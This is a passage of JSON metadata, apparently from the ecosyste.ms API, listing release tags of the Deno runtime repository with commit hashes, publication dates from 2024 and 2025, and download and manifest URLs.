%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2c